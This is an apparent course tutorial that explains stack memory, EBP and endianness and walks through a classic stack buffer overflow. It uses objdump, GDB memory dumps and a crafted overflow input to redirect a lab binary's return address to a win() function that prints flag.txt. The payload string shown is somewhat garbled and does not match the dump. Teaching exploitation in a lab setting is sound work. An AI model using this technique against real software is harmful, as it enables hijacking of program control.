Buffer Overflow Attack from the Ground-up I: Simple Overflow
Buffer overflow is a security flaw where data exceeds a buffer’s capacity, spilling into neighboring memory. This overflow can corrupt crucial data, causing system instability or even enabling attackers to hijack control.
Stack and Heap
When a program is running, it is referred to as a process. Processes occupy a portion of the computer’s memory, where they store their code, data, and other necessary information required for execution.
In the context of memory management, heap and stack refer to different areas of a process’s memory, each with distinct purposes and characteristics:
How the stack works:
The stack is the reserved memory space for a process to execute. When a function is called, a block is reserved on the newest-end of the stack for local variables and some bookkeeping data.
- Function Calls: When a function is called, a new block of memory is reserved on top of the stack. This block is used to store the function’s local variables and some additional information needed for the function to work.
- Returning from Functions: When the function finishes, its block of memory is no longer needed. This block is freed up and can be reused the next time another function is called.
- LIFO Order: The stack follows a last-in, first-out (LIFO) order. This means that the most recently reserved block of memory is always the first one to be freed.
- Upside-down: The stack is upside-down, where a higher memory address is older and a lower memory address is newer.
How the heap works:
The heap is memory for dynamic allocation. Unlike the stack, there's no enforced pattern to the allocation and deallocation of blocks from the heap; you can allocate a block at any time and free it at any time. This makes it much more complex to keep track of which parts of the heap are allocated or free at any given time; there are many custom heap allocators available to tune heap performance for different usage patterns [1], i.e., defining global variables.
Stack-based Buffer Overflow
Unlike Python and Java, some of the built-in functions in C do not perform boundary checks when pushing data into an array (hence, no extra time cost for array manipulation).
As we mentioned before, local variables (including arrays, which are contiguous blocks of memory that can be accessed via a pointer to the first element) are stored on the stack. When a process is running, the stack grows and shrinks dynamically as functions are called and return. The stack pointer (ESP in x86 or RSP in x86-64) adjusts to allocate and deallocate stack space.
EBP (Extended Base Pointer)
When a function is called, the current value of the stack pointer (ESP) is typically saved in the base pointer (EBP), and the ESP is adjusted to allocate space for the function's stack frame, moving downwards (to lower) in memory.
This allows the function to access its parameters and local variables relative to a fixed reference point, even as the stack pointer changes during the function’s execution.
More explicitly, The space between ESP and EBP contains the local variables and possibly other data for the current function’s execution.
The return address is allocated at an important part of the stack. The return address is where the function returns after it is completely executed.
If the function is called by the main function, the return address should point to the place in the main function immediately after calling this function. If a function is called recursively, such as when an outer function calls an inner function, the return address of the inner function is the place immediately after the call instruction in the outer function, not the inner function itself. Therefore, some high-level programming languages impose a maximum recursion depth to prevent excessive allocation of stack space.
Let's take a look at the following example.
The code works like the cat
command in Linux, outputting whatever the user inputs. However, a buffer was declared inside the vuln()
function without applying a boundary check. This enables attackers to overwrite the stack memory beyond the allocated buffer size.
Given the vuln()
function’s buffer overflow vulnerability, an attacker could potentially:
- Provide an input longer than 148 characters to overflow
buf
. - Overwrite the return address of
vuln()
to point to thewin()
function’s address. - When
vuln()
returns, instead of returning to the callermain
, it would jump to thewin()
function, thereby executing thewin()
function and potentially printing the contents of “flag.txt”.
We need to disassembly the compiled binary, then we can easily check the memory address of the return address ret
. Say the binary called vuln
, the following command can print out the assembly code for vuln
.
objdump -d ./vuln
The partial assembly code is shown as follow:
The ret address should be 0x8049390 since it is the bit right after calling vuln()
.
Then we need to use GDB to see what is happened when a user input a string, by setting the GDB break point to 0x80492f4, we can make the process stop after user input. Assume that inputting a non-sense characters 1010101012341234
, the GDB should log as the previous code block shows.
(gdb) b *0x80492f4
Breakpoint 1 at 0x80492f4
(gdb) r
Starting program: /afs/andrew.cmu.edu/usr24/zhongboy/private/14741/b1/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Enter a string:
Breakpoint 1, 0x080492f4 in vuln ()
(gdb) nexti
1010101012341234
0x080492f9 in vuln ()
To see what happens inside the memory, use x/64xw $esp
, which means display 64 units of memory formatting as hexadecimal word (4 bytes each) from the ESP pointer.
(gdb) x/64xw $esp
0xffffd650: 0xffffd66c 0x000007d4 0x00000011 0x080492e4
0xffffd660: 0xf7ffdba0 0x00000000 0x08048322 0x30313031
0xffffd670: 0x30313031 0x34333231 0x34333231 0xf7ffda00
0xffffd680: 0xffffd6c0 0xf7ffdc0c 0xf7fbe7b0 0x00000001
0xffffd690: 0x00000001 0x00000000 0x00000011 0x00000001
0xffffd6a0: 0x00000001 0x00000000 0xf7ffd000 0x08048308
0xffffd6b0: 0x0804c00c 0x00000001 0xffffd6f8 0xf7f7ea60
0xffffd6c0: 0xf7f80da0 0xf7f80000 0xffffd6f8 0xf7dc748c
0xffffd6d0: 0xf7f80da0 0x0804c000 0xffffd7f4 0xf7ffcb80
0xffffd6e0: 0xffffd728 0xf7fd9004 0x00000001 0x0804c000
0xffffd6f0: 0xffffd7f4 0xf7ffcb80 0xffffd728 0x08049388
0xffffd700: 0xf7f80da0 0x0804c000 0xffffd728 0x08049390
0xffffd710: 0xffffd750 0xf7fbe66c 0xf7fbeb10 0x00000064
0xffffd720: 0xffffd740 0xf7f80000 0xf7ffd020 0xf7d77519
0xffffd730: 0xffffd96b 0x00000070 0xf7ffd000 0xf7d77519
0xffffd740: 0x00000001 0xffffd7f4 0xffffd7fc 0xffffd760
As illustrated in the block, the ASCII code for the input 1010101012341234
is indicated using [...]
, which is in little-endian (reversed order).
Endianness
Endianness refers to the order in which bytes are arranged in memory to represent larger data types (such as integers). There are two primary types of endianness:
- Big-endian
In big-endian format, the most significant byte (the “big end”) is stored at the smallest memory address, and the least significant byte is stored at the largest memory address.
- Little-endian
In little-endian format, the least significant byte (the “little end”) is stored at the smallest memory address, and the most significant byte is stored at the largest memory address.
The return address is indicated using (...)
.
0xffffd650: 0xffffd66c 0x000007d4 0x00000011 0x080492e4 0xffffd660: 0xf7ffdba0 0x00000000 0x08048322 [0x30313031 0xffffd670: 0x30313031 0x34333231 0x34333231] 0xf7ffda00 0xffffd680: 0xffffd6c0 0xf7ffdc0c 0xf7fbe7b0 0x00000001 0xffffd690: 0x00000001 0x00000000 0x00000011 0x00000001 0xffffd6a0: 0x00000001 0x00000000 0xf7ffd000 0x08048308 0xffffd6b0: 0x0804c00c 0x00000001 0xffffd6f8 0xf7f7ea60 0xffffd6c0: 0xf7f80da0 0xf7f80000 0xffffd6f8 0xf7dc748c 0xffffd6d0: 0xf7f80da0 0x0804c000 0xffffd7f4 0xf7ffcb80 0xffffd6e0: 0xffffd728 0xf7fd9004 0x00000001 0x0804c000 0xffffd6f0: 0xffffd7f4 0xf7ffcb80 0xffffd728 0x08049388 0xffffd700: 0xf7f80da0 0x0804c000 0xffffd728 (0x08049390) 0xffffd710: 0xffffd750 0xf7fbe66c 0xf7fbeb10 0x00000064 0xffffd720: 0xffffd740 0xf7f80000 0xf7ffd020 0xf7d77519 0xffffd730: 0xffffd96b 0x00000070 0xf7ffd000 0xf7d77519 0xffffd740: 0x00000001 0xffffd7f4 0xffffd7fc 0xffffd760
To overflow the buffer and overwrite the return address, we can construct an input string using Python (the code is shown as follows) to make the memory like this:
0xffffd650: 0xffffd66c 0x000007d4 0x00000011 0x080492e4 0xffffd660: 0xf7ffdba0 0x00000000 0x08048322 [0x30313031 0xffffd670: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd680: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd690: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd6a0: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd6b0: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd6c0: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd6d0: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd6e0: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd6f0: 0x31313131 0x31313131 0x31313131 0x31313131 0xffffd700: 0x31313131 0x31313131 0x31313131 (0x08049256) 0xffffd710: 0xffffd750 0xf7fbe66c 0xf7fbeb10 0x00000064 0xffffd720: 0xffffd740 0xf7f80000 0xf7ffd020 0xf7d77519 0xffffd730: 0xffffd96b 0x00000070 0xf7ffd000 0xf7d77519 0xffffd740: 0x00000001 0xffffd7f4 0xffffd7fc 0xffffd760
The string in binary is: 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000V
Bingo! When we input this 'evil' string (some characters may not show up) into the program, it will display the content of flag.txt
.
More Readings
Buffer Overflow Attack from the Ground-up IV: Return to Libc